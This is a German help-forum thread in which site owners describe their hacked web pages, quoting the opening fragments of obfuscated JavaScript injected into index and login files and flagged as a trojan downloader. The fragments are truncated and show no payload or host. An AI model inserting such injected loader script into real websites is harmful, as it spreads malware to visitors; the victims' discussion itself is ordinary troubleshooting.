Tronjaner auf meiner Internetseite Hallo Leute, anscheinend wurde meine Internetseite gehackt. Auf der Startseite erschien vom Virenprogramm die Meldung, es sei mit "Trojan-Downloader.JS.Iframe.bcw" infiziert. Als ich die HTML Seite im FTP Programm geöffnet hatte war im <head> neuer Quellcode eingefügt, der wie folgt aussah Code: <script>function c241384d21q4a94f0743f8e7(q4a94f074400b8){ Fragen über Fragen... Ich danke euch! Viele Grüße, Tristan |
Also, wie ich gerade gesehen habe wurden immer nur die index.php/html und login.php/html Dateien infiziert. Das ganze ging laut FTP-Log gestern Morgen innerhalb von Sekundenabständen vor sich. Sieht so aus, als wäre da ein Keylogger am Werk gewesen, der das FTP Passwort abgegriffenhat, oder? Viele Grüße, Tristan |
Hallo! Ich habe ein ähnliches Problem. Habe schon desöfteren den kompletten Webserver überarbeiten müssen... Finde aber den besagten "Trojaner" oder zumindest den Ursprung des Problems nicht. Das Hier steht bei mir in jeder index.html (.php / .html etc.), in jeder home.html sowie in Dateien mit dem "default" im Namen (bspw: default-embeds.php etc.): Code: <script>var GW;if(GW!='d'){GW='d'};function w(){var J='';var Q;if(Q!='T' && Q!='R'){Q='T'};var |
Alle Zeitangaben in WEZ +1. Es ist jetzt 04:32 Uhr. |
Copyright ©2000-2024, Trojaner-Board